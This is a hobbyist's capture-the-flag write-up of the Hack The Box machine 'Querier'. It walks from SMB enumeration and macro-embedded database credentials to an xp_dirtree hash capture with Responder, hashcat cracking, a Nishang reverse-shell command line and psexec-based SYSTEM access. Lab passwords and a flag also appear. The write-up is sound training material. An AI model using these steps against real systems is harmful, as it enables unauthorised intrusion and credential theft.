# QUERIER |  10.10.10.125

## Initial Enumeration - nmap scan

### Open Ports
* 135
* 139
* 445
* 1433
* 5985
* 47001
* 49664-49670

### Service and OS Discovery

#### OS
Windows 10?

#### Services
135: MSRPC   
139: Samba   
445: Samba - Signing not required   
1433: Microsoft SQL Server 2017 RTM - 14.00.1000.00 - no post Service Pack patches applied   
5985: WinRm  
47001: WinRm   
49664-49670: MSRPC

## Service Enumeration

### Samba - 139/445

Connecting via smbclient allowed me to view the shares on the server:

![smb-shares](smb-shares.png)

Moving into the folder, there was a single excel spreadsheet file, so I grabbed that to examine the contents. .Xlsm files are basically like zip files, so uncompress one and there are several files.  
In one of them was a reference to a possible username:

![user-enum](Luis.png)

Opening the original file in a spreadsheet program and viewing the script(s) within (the file contains macros which will not run on my machine because it's insecure), it looks like I found credentials to a database:

![creds](macro-creds.png)

### MSSQL - 1433

So, now I have a potential username and password to connect to the running SQL instance:

**Username:** Luis

**Password:** PcwTWTHRwryjc$c6

After banging my head against the wall for a while because nothing was working, I realized that the actual username was under my nose the whole time - this is a service account, not a user account, so I was using the wrong username:

![reporting](macro-creds.png)

This shows the **uid** (user id) as **reporting**, _not_ Luis! So after figuring that out, I was finally able to connect to the db using mssqlclient from the impacket tookit:

![sql-access](sql-access.png)

## Exploitation

Have to admit at this point I had absolutely _no idea_ what to, so I used the [SQL Server Pentesting](https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server#having-credentials) Section on hacktricks.xyz to find my way.  
The link goes thru various ways of enumerating/exploiting MSSQL instances if you have creds, which I do.  
The one that worked was abusing the xp_dirtree function(?) in order to steal hashes for the service account.

The method here is as follows:
* First, fire up responder.py from impacket

![responder](responder.png)

* Then, execute the command in the SQL client, which makes the server connect to my responder instance, via smb:

![dirtree](xp-dirtree.png)

* Lastly, sit back and watch the hash roll in, back in the window running responder:

![hash](hash.png)

Hashcat managed the hash quite easily - I ran the command
> hashcat -m 5600 hash usr/share/wordlists/rockyou.txt -O

and now we have a cleartext password we can use for access/more enumeration:

![hashcat](cracked.png)

So with the password 'corporate568' I logged back into the SQL server under the 'mssql-svc' user, which has elevated permissions (compared to the 'reporting' user):

![sqlagain](elevated-mssql.png)

I am able to run shell commands using this account, so I can get a little more enumeration in as well. Now it's confirmed that the machine is indeed a Windows 10 machine, the server version at that.  
Additionally, the mssql-svc user has SeImpersonatePrivilege, which could mean it is vulnerable to the JuicyPotato attack. (Turns out that Windows Server 2019 is **not** vulnerable to a Potato attack)

![privs](privs.png)

Before I try too hard to get a real shell, I'll use the xp_cmdshell to read the user.txt file...
> c37b41bb669da345bb14de50faab3c16

## Escalation

Now to the challenging part. After researching for what seemed like hours on how to leverage xp_cmdshell to a reverse shell, I thought I finally figured it out.  
Using the [Nishang Invoke Powershell Script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) I was able to gain a reverse powershell on the machine*.  
I needed to add "Invoke-PowershellTcp -Reverse -IPAddress xxxx -Port xxxx" to the bottom of the script, then
* Host the powershell file on my machine via python 3 http.server
* Re-enable the xp_cmdshell on the mssql client (because it disables after a while)
* Then enter the correct command with the correct quotation-escaping syntax (which baffled me for longer than I am willing to admit)

But now I have a shell!

![shell](shell.png)

However, Windows seems to know I am an interloper and continually blocks many commands I send using the InvokePS script.  
After a bit I am basically prevented from grabbing any remote files and running many commands. So, changing tack for a moment, I used the previous powershell command in the mssql client to download and run **PowerUp**, which could do some limited enum for me.

![pw](admin-pw.png)

Seems I found an admin password from the neglected Group Policy Preference (GPP) xml file - MyUnclesAreMarioAndLuigi!!1!

Hoping this would be a quick win since I struggled for so long, I plugged these creds into psexec.py and just like that I was NT AUTHORITY\SYSTEM!

![root](root.png)

## Conclusion
Have to admit, this was a little surprising and I guess it's not the "correct" way, but I'm still calling it a win. Being a novice and having little to no knowledge of both SQL and Powershell, this box was really really difficult. I struggled with the correct syntax for all the commands I used, and had a hard time leveraging my gains towards anything useful.  
But ultimately, with every small win I kept returning to my base camp so to speak, and trying to get further with the information I found.

So to recap, I:
* Found credentials stored in a macro inside an excel file that was stashed on an open SMB share;
* Logged into the mssql with those credentials and used the _exec master...xp_dirtree command in order to
* Force a connection to my fake smb server in order to grab an NTLMv2 hash, then
* Cracked the hash using hashcat, which allowed me to
* Log in to the mssql server with slightly elevated privs.
* With those prvivleges I was able to upload and execute a powershell-based enum script, which
* Displayed the Administrator password in plaintext from an AES-encrypted file that had it's decryption key leaked online. Finally,
* I used psexec.py to gain a root shell on the machine.


*I learned later that I could have used a simpler powershell command ("Invoke-WebRequest") that also specifies the location of the downloaded file and put netcat on there to get a reverse shell. I was admittedly baffled by the powershell syntax and to me it appeared that the machine's antivirus was deleting any executables I put on the system.
